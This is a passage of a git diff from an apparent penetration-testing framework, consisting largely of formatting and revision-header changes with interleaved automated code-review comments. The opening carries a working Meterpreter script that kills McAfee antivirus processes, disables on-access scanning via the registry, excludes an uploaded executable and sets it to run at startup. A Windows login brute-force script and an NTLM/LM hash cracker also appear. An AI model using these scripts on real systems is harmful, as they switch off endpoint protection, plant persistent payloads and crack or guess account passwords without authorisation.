v8.7.0i+, uploads an executable to TEMP folder adds it" + print_line "to exclusion list and set it to run at startup. 
(Requires administrator privilege)" + print_line "----------------------------------------------------------------------------------------------" + print_line(@@exec_opts.usage) +end + +@path = "" +@location = "" + +def upload(session,file,trgloc) + if not ::File.exists?(file) + raise "File to Upload does not exists!" + else + @location = session.fs.file.expand_path("%TEMP%") + begin + ext = file.scan(/\S*(.exe)/i) + if ext.join == ".exe" + fileontrgt = "#{@location}\\MS#{rand(100)}.exe" + else + fileontrgt = "#{@location}\\MS#{rand(100)}#{ext}" + end + @path = fileontrgt + print_status("Uploading #{file}....") + session.fs.file.upload_file("#{fileontrgt}","#{file}") + print_status("Uploaded as #{fileontrgt}") + rescue ::Exception => e + print_status("Error uploading file #{file}: #{e.class} #{e}") + end + end + return fileontrgt +end + +#parsing of Options +file = "" +helpcall = 0 +killonly = 0 +@@exec_opts.parse(args) { |opt, idx, val| + case opt + when "-e" + file = val || "" + when "-h" + helpcall = 1 + when "-k" + killonly = 1 + end + +} + +if killonly == 0 + if file == "" + usage + raise Rex::Script::Completed + end +end + +# Magic kill order :) +avs = %W{ + shstat.exe + engineserver.exe + frameworkservice.exe + naprdmgr.exe + mctray.exe + mfeann.exe + vstskmgr.exe + mcshield.exe +} + +av = 0 + +plist = client.sys.process.get_processes() +plist.each do |x| + if (avs.index(x['name'].downcase)) + av = av + 1 + end +end + + +if av > 6 + print_status("VirusScan Enterprise v8.7.0i+ is running...") +else + print_status("VirusScan Enterprise v8.7.0i+ is not running!") + raise Rex::Script::Completed +end + +target_pid = nil +target ||= "mfevtps.exe" + +print_status("Migrating to #{target}...") + +# Get the target process pid +target_pid = client.sys.process[target] + +if not target_pid + print_error("Could not access the target process") + raise Rex::Script::Completed +end + +print_status("Migrating into process ID #{target_pid}") +client.core.migrate(target_pid) + 
+target_pid = nil + +if killonly == 1 + avs.each do |x| + # Get the target process pid + target_pid = client.sys.process[x] + print_status("Killing off #{x}...") + client.sys.process.kill(target_pid) + end +else + avs.each do |x| + # Get the target process pid + target_pid = client.sys.process[x] + print_status("Killing off #{x}...") + client.sys.process.kill(target_pid) + end + + # Upload it + exec = upload(session,file,"") + + # Initiailze vars + key = nil + value = nil + data = nil + type = nil + + # Mcafee registry key + key = 'HKLM\Software\Mcafee\VSCore\On Access Scanner\MCShield\Configuration\Default' + + # Split the key into its parts + root_key, base_key = client.sys.registry.splitkey(key) + + # Disable when writing to disk option + value = "bScanIncoming" + data = 0 + type = "REG_DWORD" + open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE) + open_key.set_value(value, client.sys.registry.type2str(type), data) + print_status("Successful set #{key} -> #{value} to #{data}.") + + # Disable when reading from disk option + value = "bScanOutgoing" + data = 0 + type = "REG_DWORD" + open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE) + open_key.set_value(value, client.sys.registry.type2str(type), data) + print_status("Successful set #{key} -> #{value} to #{data}.") + + # Disable detection of unwanted programs + value = "ApplyNVP" + data = 0 + type = "REG_DWORD" + open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE) + open_key.set_value(value, client.sys.registry.type2str(type), data) + print_status("Successful set #{key} -> #{value} to #{data}.") + + # Increase the number of excluded items + value = "NumExcludeItems" + data = 1 + type = "REG_DWORD" + open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE) + open_key.set_value(value, client.sys.registry.type2str(type), data) + print_status("Successful set #{key} -> #{value} to #{data}.") + + # Add executable to excluded item folder + value = 
"ExcludedItem_0" + data = "3|3|" + @location + type = "REG_SZ" + open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE) + open_key.set_value(value, client.sys.registry.type2str(type), data) + print_status("Successful set #{key} -> #{value} to #{data}.") + + # Set registry to run executable at startup + key = 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run' + # Split the key into its parts + root_key, base_key = client.sys.registry.splitkey(key) + value = "MS" + data = @path + open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE) + open_key.set_value(value, client.sys.registry.type2str(type), data) + print_status("Successful set #{key} -> #{value} to #{data}.") +end + +print_status("Finished!") diff --git a/scripts/meterpreter/vnc.rb b/scripts/meterpreter/vnc.rb index 010f1a4ab1..9e9795b937 100644 --- a/scripts/meterpreter/vnc.rb +++ b/scripts/meterpreter/vnc.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # # Meterpreter script for obtaining a quick VNC session diff --git a/scripts/meterpreter/webcam.rb b/scripts/meterpreter/webcam.rb index e0637847dc..5111081670 100644 --- a/scripts/meterpreter/webcam.rb +++ b/scripts/meterpreter/webcam.rb @@ -2,7 +2,7 @@ # $Revision$ # Author: scriptjunkie # -# Simplify running webcam, whether grabbing a single frame or running +# Simplify running webcam, whether grabbing a single frame or running # a continous loop. @client = client @@ -66,7 +66,7 @@ begin end print_line("[*] Starting webcam #{index}: #{camlist[index - 1]}") client.webcam.webcam_start(index) - + #prepare output if(gui) sock = Rex::Socket::Udp.create( diff --git a/scripts/meterpreter/win32-sshclient.rb b/scripts/meterpreter/win32-sshclient.rb index 8b06684b38..1ce149edc3 100644 --- a/scripts/meterpreter/win32-sshclient.rb +++ b/scripts/meterpreter/win32-sshclient.rb 
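Review bot: `helpcall = 1` is set for `-h` but never read afterwards, so `-h` combined with `-k` proceeds with the kill list instead of printing help; a check right after the parse block, `if helpcall == 1; usage; raise Rex::Script::Completed; end`, closes that gap. In `upload`, `ext = file.scan(/\S*(.exe)/i)` is an Array, so the non-.exe branch builds `"#{@location}\\MS#{rand(100)}#{ext}"` with a literal `[]` in the file name; `::File.extname(file)` yields the extension as a String, and the `trgloc` parameter is unused. The hunk rewrites the whole file (mode 100755 → 100644 plus the header), so these are pre-existing rather than new to this commit.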
@@ -1,6 +1,7 @@ # win32-sshclient.rb # # $Id$ +# $Revision$ # # Meterpreter script to deploy & run the "plink" commandline ssh-client # supports only MS-Windows-2k/XP/Vista Hosts diff --git a/scripts/meterpreter/win32-sshserver.rb b/scripts/meterpreter/win32-sshserver.rb index 12266ab497..902b85d893 100644 --- a/scripts/meterpreter/win32-sshserver.rb +++ b/scripts/meterpreter/win32-sshserver.rb @@ -1,6 +1,7 @@ # win32-sshserver.rb # # $Id$ +# $Revision$ # # meterpreter-script to deploy + run OpenSSH # on the target machine diff --git a/scripts/meterpreter/winbf.rb b/scripts/meterpreter/winbf.rb index 2ce1fe1328..3cc3ae5af3 100644 --- a/scripts/meterpreter/winbf.rb +++ b/scripts/meterpreter/winbf.rb @@ -4,12 +4,12 @@ #------------------------------------------------------------------------------- ################## Variable Declarations ################## @@exec_opts = Rex::Parser::Arguments.new( - "-h" => [ false, "\tHelp menu."], - "-t" => [ true, "\tTarget IP Address"], - "-p" => [ true, "\tPassword List"], - "-cp" => [ false, "\tCheck Local Machine Password Policy"], - "-L" => [ true, "\tUsername List to be brute forced"], - "-l" => [ true, "\tLogin name to be brute forced"] + "-h" => [ false, "\tHelp menu."], + "-t" => [ true, "\tTarget IP Address"], + "-p" => [ true, "\tPassword List"], + "-cp" => [ false, "\tCheck Local Machine Password Policy"], + "-L" => [ true, "\tUsername List to be brute forced"], + "-l" => [ true, "\tLogin name to be brute forced"] ) # Variables for Options user = [] 
@@ -66,56 +66,56 @@ end def passbf(session,passlist,target,user,opt,logfile) print_status("Running Brute force attack against #{user}") print_status("Successfull Username and Password pairs are being saved in #{logfile}") - result = [] + result = [] output = [] passfnd = 0 - a = [] + a = [] i = 0 if opt == 1 if not ::File.exists?(user) raise "Usernames List File does not exists!" - else - user = ::File.open(user, "r") - end + else + user = ::File.open(user, "r") + end end # Go thru each user user.each do |u| # Go thru each line in the password file while passfnd < 1 ::File.open(passlist, "r").each_line do |line| - begin - print_status("Trying #{u.chomp} #{line.chomp}") + begin + print_status("Trying #{u.chomp} #{line.chomp}") + + # Command for testing local login credentials + r = session.sys.process.execute("cmd /c net use \\\\#{target} #{line.chomp} /u:#{u.chomp}", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + output << d + end + r.channel.close + r.close + + # Checks if password is found + result = output.to_s.scan(/The\scommand\scompleted\ssuccessfully/) + if result.length == 1 + print_status("\tUser: #{u.chomp} pass: #{line.chomp} found") + file_local_write(logfile,"User: #{u.chomp} pass: #{line.chomp}") + r = session.sys.process.execute("cmd /c net use \\\\#{target} /delete", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + output << d + end + output.clear + r.channel.close + r.close + passfnd = 1 + break + end + rescue ::Exception => e + print_status("The following Error was encountered: #{e.class} #{e}") + end - # Command for testing local login credentials - r = session.sys.process.execute("cmd /c net use \\\\#{target} #{line.chomp} /u:#{u.chomp}", nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - output << d - end - r.channel.close - r.close - - # Checks if password is found - result = output.to_s.scan(/The\scommand\scompleted\ssuccessfully/) - if result.length == 1 - 
print_status("\tUser: #{u.chomp} pass: #{line.chomp} found") - file_local_write(logfile,"User: #{u.chomp} pass: #{line.chomp}") - r = session.sys.process.execute("cmd /c net use \\\\#{target} /delete", nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - output << d - end - output.clear - r.channel.close - r.close - passfnd = 1 - break - end - rescue ::Exception => e - print_status("The following Error was encountered: #{e.class} #{e}") - end - - end - passfnd = 1 - end + end + passfnd = 1 + end passfnd = 0 end end @@ -152,33 +152,31 @@ unsupported if client.platform !~ /win32|win64/i # Parsing of Options @@exec_opts.parse(args) { |opt, idx, val| case opt - when "-l" - user << val - ulopt = 0 - when "-L" - userlist = val - ulopt = 1 - - when "-cp" - chkpolicy(session) - exit - when "-p" - - passlist = val - if not ::File.exists?(passlist) - raise "Password File does not exists!" - end - when "-t" - target = val - when "-h" - print( - "Windows Login Brute Force Meterpreter Script\n" + - "Usage:\n" + - @@exec_opts.usage - ) - helpcall = 1 - end - + when "-l" + user << val + ulopt = 0 + when "-L" + userlist = val + ulopt = 1 + + when "-cp" + chkpolicy(session) + exit + when "-p" + + passlist = val + if not ::File.exists?(passlist) + raise "Password File does not exists!" + end + when "-t" + target = val + when "-h" + print("Windows Login Brute Force Meterpreter Script\n" + + "Usage:\n" + + @@exec_opts.usage) + helpcall = 1 + end + } # Execution of options selected @@ -191,11 +189,9 @@ elsif userlist != nil && passlist != nil && target != nil passbf(session,passlist,target,userlist,ulopt,logme(target)) elsif helpcall == 0 + print("Windows Login Brute Force Meterpreter Script\n" + + "Usage:\n" + + @@exec_opts.usage) - print( - "Windows Login Brute Force Meterpreter Script\n" + - "Usage:\n" + - @@exec_opts.usage - ) end diff --git a/scripts/meterpreter/wmic.rb b/scripts/meterpreter/wmic.rb index 8a1bd40653..b91b553545 100644 
--- a/scripts/meterpreter/wmic.rb +++ b/scripts/meterpreter/wmic.rb @@ -28,7 +28,7 @@ def wmicexec(session,wmiccmds= nil) wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000)) wmiccmds.each do |wmi| print_status "running command wmic #{wmi}" - puts wmicfl + print_line wmicfl r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmicfl} #{wmi}", nil, {'Hidden' => true}) sleep(2) #Making sure that wmic finishes before executing next wmic command @@ -77,7 +77,7 @@ end def usage print_line("Windows WMIC Command Execution Meterpreter Script ") - puts @@exec_opts.usage + print_line @@exec_opts.usage print_line("USAGE:") print_line("run wmic -c \"WMIC Command Argument\"\n") print_line("NOTE:") diff --git a/scripts/shell/migrate.rb b/scripts/shell/migrate.rb index 1dd96c9e15..327fef8a3a 100644 --- a/scripts/shell/migrate.rb +++ b/scripts/shell/migrate.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # # Simply print a message that migrating is not supported on CommandShell sessions... # diff --git a/scripts/shell/spawn_meterpreter.rb b/scripts/shell/spawn_meterpreter.rb index 672e8adc50..e6fa404769 100644 --- a/scripts/shell/spawn_meterpreter.rb +++ b/scripts/shell/spawn_meterpreter.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # # Spawn a meterpreter session using an existing command shell session # diff --git a/tools/import_webscarab.rb b/tools/import_webscarab.rb index 10b0bff8f5..9a8ab88c49 100755 --- a/tools/import_webscarab.rb +++ b/tools/import_webscarab.rb 
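Review bot: `print_line wmicfl` sits inside the `wmiccmds.each` loop, but `wmicfl` is computed once before the loop, so the same scratch path is echoed for every command; either hoist the line above the loop or fold it into the status line, `print_status "running command wmic #{wmi} (appending to #{wmicfl})"`. The fixed `sleep(2)` that follows is the only thing sequencing the commands: if one `wmic.exe` invocation takes longer than two seconds, the next one starts appending to the same file while the first is still writing and the output interleaves. The process object returned by `session.sys.process.execute` is discarded here; if it exposes a wait or close, using it instead of the sleep would make the sequencing deterministic, though that is inferred from the call rather than visible in the hunk. `wmicexec` begins and ends outside the hunk.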
@@ -52,7 +52,8 @@ puts("Opening database file: #{db_file}") database = SQLite3::Database.new(db_file) # Prepare the insert statement... -insert_statement = database.prepare("INSERT INTO requests(host,port,ssl,meth,path,headers,query,body,respcode,resphead,response,created) VALUES(:host,:port,:ssl,:meth,:path,:headers,:query,:body,:respcode,:resphead,:response,:created)"); +insert_statement = database.prepare("INSERT INTO requests(host,port,ssl,meth,path,headers,query,body,respcode,resphead,response,created)" + + " VALUES(:host,:port,:ssl,:meth,:path,:headers,:query,:body,:respcode,:resphead,:response,:created)"); # target hash -> Resolving dns names is soooo slow, I don't know why. So we use the # following hash as a "micro hosts", so we don't have to call getaddress each time... diff --git a/tools/list_interfaces.rb b/tools/list_interfaces.rb index 5a59f45beb..bc649e192c 100755 --- a/tools/list_interfaces.rb +++ b/tools/list_interfaces.rb @@ -1,9 +1,9 @@ #!/usr/bin/env ruby # -# $Id:$ -# $Revision:$ +# $Id$ +# $Revision$ # -# This small utility will display all the informations about the network interfaces +# This small utility will display all the informations about the network interfaces # that one can use under Windows with modules using pcaprub and having the INTERFACE option (ex: arp_poisonning, arp_sweep, ...). # To use th interface option under Windows use the Index value displayed by this tool (ex: "SET INTERFACE 1") # @@ -19,14 +19,14 @@ if RUBY_PLATFORM == "i386-mingw32" Pcap.respond_to?(:interfaces) and Pcap.respond_to?(:addresses)) $stderr.puts "Error: Looks like you are not running the latest version of pcaprub" - exit + exit end found = false Pcap.interfaces.each_with_index do |iface, i| found = true detail = Pcap.interface_info(iface) addr = Pcap.addresses(iface) - puts "#" * 70 + puts "#" * 70 puts "" puts "INDEX : " + (i + 1).to_s puts "NAME : " + detail["name"] 
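Review bot: The rebuilt `database.prepare(...)` call on the new side still ends with a trailing `;`, which is not idiomatic Ruby and is the only statement terminator in the hunk. Splitting the SQL into two literals joined with `+` at runtime is also fragile: the statement only stays valid because of the leading space in `" VALUES(`, and a later edit that drops it would silently produce a broken query. A plain heredoc keeps the statement readable as one unit without relying on that join, as below; the named placeholders are kept as they are. Whether `insert_statement` is finalized later is outside the hunk.
```ruby
insert_statement = database.prepare(<<-SQL)
  INSERT INTO requests(host,port,ssl,meth,path,headers,query,body,respcode,resphead,response,created)
  VALUES(:host,:port,:ssl,:meth,:path,:headers,:query,:body,:respcode,:resphead,:response,:created)
SQL
```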
diff --git a/tools/lm2ntcrack.rb b/tools/lm2ntcrack.rb index eba6063b9e..9ff9bdebb3 100755 --- a/tools/lm2ntcrack.rb +++ b/tools/lm2ntcrack.rb @@ -68,7 +68,7 @@ $args.parse(ARGV) { |opt, idx, val| end } -if not type +if not type usage else if pass and (not (hash or list)) @@ -77,20 +77,20 @@ else mode = PASS_MODE elsif list and hash and not pass mode = BRUTE_MODE - if not File.exist? list - $stderr.puts "[*] The passwords list file does not exist" + if not File.exist? list + $stderr.puts "[*] The passwords list file does not exist" exit end - if not File.file? list - $stderr.puts "[*] The passwords list provided is not a file" + if not File.file? list + $stderr.puts "[*] The passwords list provided is not a file" exit end - if not File.readable? list - $stderr.puts "[*] The passwords list file is not readable" + if not File.readable? list + $stderr.puts "[*] The passwords list file is not readable" exit end else - usage + usage end end @@ -112,8 +112,8 @@ elsif type == "NETNTLM2_SESSION" then end end -case type -when "HALFLM" +case type +when "HALFLM" case mode when BRUTE_MODE if not hash =~ /^([a-fA-F0-9]{16})$/ @@ -122,18 +122,18 @@ when "HALFLM" end found = false match_password = nil - File.open(list,"r") do |password_list| + File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') - if password =~ /^.{1,7}$/ + if password =~ /^.{1,7}$/ puts password - calculatedhash = CRYPT::lm_hash(password,true).unpack("H*")[0].upcase + calculatedhash = CRYPT::lm_hash(password,true).unpack("H*")[0].upcase if calculatedhash == hash.upcase found = true match_password = password break end - end + end end end if found @@ -170,7 +170,7 @@ when "HALFLM" end end -when "LM" +when "LM" case mode when BRUTE_MODE if not hash =~ /^([a-fA-F0-9]{32})$/ 
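Review bot: Opening the wordlist with `"rb"` makes each `line` an ASCII-8BIT string on Ruby 1.9, so non-ASCII entries reach `CRYPT::lm_hash` as raw bytes; whether that helper expects binary or an encoding-tagged string is not visible here, so a short comment on the `File.open` line recording the intent, `# binary mode: keep bytes as-is and strip CRLF ourselves`, would help the next reader. With binary mode the two chained `gsub` calls exist only to strip the newline the mode no longer translates; `password = line.chomp` does that in one step and also handles a bare `\r`. The `^`/`$` in `password =~ /^.{1,7}$/` are line anchors; they work here only because the newline was just removed, and `\A.{1,7}\z` states the whole-string check directly. The same `"rb"` plus double-`gsub` pattern recurs in the hunks at @@ -179, -236, -290, -380, -468, -554, -671 and -802. The `when "HALFLM"` branch continues outside the hunk.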
@@ -179,7 +179,7 @@ when "LM" end found = false match_password = nil - File.open(list,"r") do |password_list| + File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') if password =~ /^.{1,14}$/ @@ -190,7 +190,7 @@ when "LM" match_password = password break end - end + end end end if found @@ -236,7 +236,7 @@ when "NTLM" end found = false match_password = nil - File.open(list,"r") do |password_list| + File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') puts password @@ -245,7 +245,7 @@ when "NTLM" found = true match_password = password break - end + end end end if found @@ -290,7 +290,7 @@ when "HALFNETLMv1" end found = false match_password = nil - File.open(list,"r") do |password_list| + File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') if password =~ /^.{1,7}$/ @@ -304,7 +304,7 @@ when "HALFNETLMv1" match_password = password break end - end + end end end if found @@ -380,7 +380,7 @@ when "NETLMv1" end found = false match_password = nil - File.open(list,"r") do |password_list| + File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') if password =~ /^.{1,14}$/ @@ -392,7 +392,7 @@ when "NETLMv1" found = true match_password = password break - end + end end end end @@ -404,7 +404,7 @@ when "NETLMv1" exit end when HASH_MODE - if not pass =~ /^.{1,14}$/ + if not pass =~ /^.{1,14}$/ $stderr.puts "[*] NETLMv1 password can not be bigger then 14 characters" exit end @@ -423,7 +423,7 @@ when "NETLMv1" puts "[*] The NETLMv1 hash for #{pass.upcase} is : #{calculatedhash}" exit when PASS_MODE - if not pass =~ /^.{1,14}$/ + if not pass =~ /^.{1,14}$/ $stderr.puts "[*] NETLMv1 password can not be bigger then 14 characters" exit end 
@@ -468,18 +468,18 @@ when "NETNTLMv1" end found = false match_password = nil - File.open(list,"r") do |password_list| + File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') puts password - argntlm = { :ntlm_hash => CRYPT::ntlm_hash(password), + argntlm = { :ntlm_hash => CRYPT::ntlm_hash(password), :challenge => [ srvchal ].pack("H*") } calculatedhash = CRYPT::ntlm_response(argntlm).unpack("H*")[0].upcase if calculatedhash == hash.upcase found = true match_password = password break - end + end end end if found @@ -498,7 +498,7 @@ when "NETNTLMv1" $stderr.puts "[*] Server challenge must be exactly 16 bytes of hexadecimal" exit end - argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass), + argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass), :challenge => [ srvchal ].pack("H*") } calculatedhash = CRYPT::ntlm_response(argntlm).unpack("H*")[0].upcase puts "[*] The NETNTLMv1 hash for #{pass} is : #{calculatedhash}" @@ -516,7 +516,7 @@ when "NETNTLMv1" $stderr.puts "[*] Server challenge must be exactly 16 bytes of hexadecimal" exit end - argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass), + argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass), :challenge => [ srvchal ].pack("H*") } calculatedhash = CRYPT::ntlm_response(argntlm).unpack("H*")[0].upcase @@ -554,21 +554,21 @@ when "NETNTLM2_SESSION" found = false match_password = nil - File.open(list,"r") do |password_list| + File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') puts password - argntlm = { :ntlm_hash => CRYPT::ntlm_hash(password), + argntlm = { :ntlm_hash => CRYPT::ntlm_hash(password), :challenge => [ srvchal ].pack("H*") } optntlm = { :client_challenge => [ clichal ].pack("H*")} calculatedhash = CRYPT::ntlm2_session(argntlm,optntlm).join[24,24].unpack("H*")[0].upcase - + if calculatedhash == hash.upcase found = true match_password = password break - end + end end end if found 
@@ -595,7 +595,7 @@ when "NETNTLM2_SESSION" $stderr.puts "[*] Client challenge must be exactly 16 bytes of hexadecimal" exit end - argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass), + argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass), :challenge => [ srvchal ].pack("H*") } optntlm = { :client_challenge => [ clichal ].pack("H*")} @@ -623,7 +623,7 @@ when "NETNTLM2_SESSION" $stderr.puts "[*] Client challenge must be exactly 16 bytes of hexadecimal" exit end - argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass), + argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass), :challenge => [ srvchal ].pack("H*") } optntlm = { :client_challenge => [ clichal ].pack("H*")} @@ -671,7 +671,7 @@ when "NETLMv2" found = false match_password = nil - File.open(list,"r") do |password_list| + File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') puts password @@ -683,7 +683,7 @@ when "NETLMv2" found = true match_password = password break - end + end end end if found @@ -802,7 +802,7 @@ when "NETNTLMv2" found = false match_password = nil - File.open(list,"r") do |password_list| + File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') puts password @@ -815,7 +815,7 @@ when "NETNTLMv2" found = true match_password = password break - end + end end end if found diff --git a/tools/vxdigger.rb b/tools/vxdigger.rb index 99e2df9b53..f5784a8092 100755 --- a/tools/vxdigger.rb +++ b/tools/vxdigger.rb @@ -9,6 +9,8 @@ # # (C) 2010 Rapid7 # +# $Revision$ +# def usage $stderr.puts "usage: #{$0} [dump-file] " diff --git a/tools/vxencrypt.rb b/tools/vxencrypt.rb index dcb2bc8b77..7c8d7d3924 100755 --- a/tools/vxencrypt.rb +++ b/tools/vxencrypt.rb @@ -2,8 +2,8 @@ # # This script can be used to calculate hash values for VxWorks passwords. # - - +# $Revision$ +# def hashit(inp) if inp.length < 8 or inp.length > 120 
diff --git a/tools/vxmaster.rb b/tools/vxmaster.rb index af6014b250..396f567dd8 100755 --- a/tools/vxmaster.rb +++ b/tools/vxmaster.rb @@ -9,6 +9,8 @@ # # (C) 2010 Rapid7 # +# $Revision$ +# # VxWorks converts the clear-text password into single integer value. This value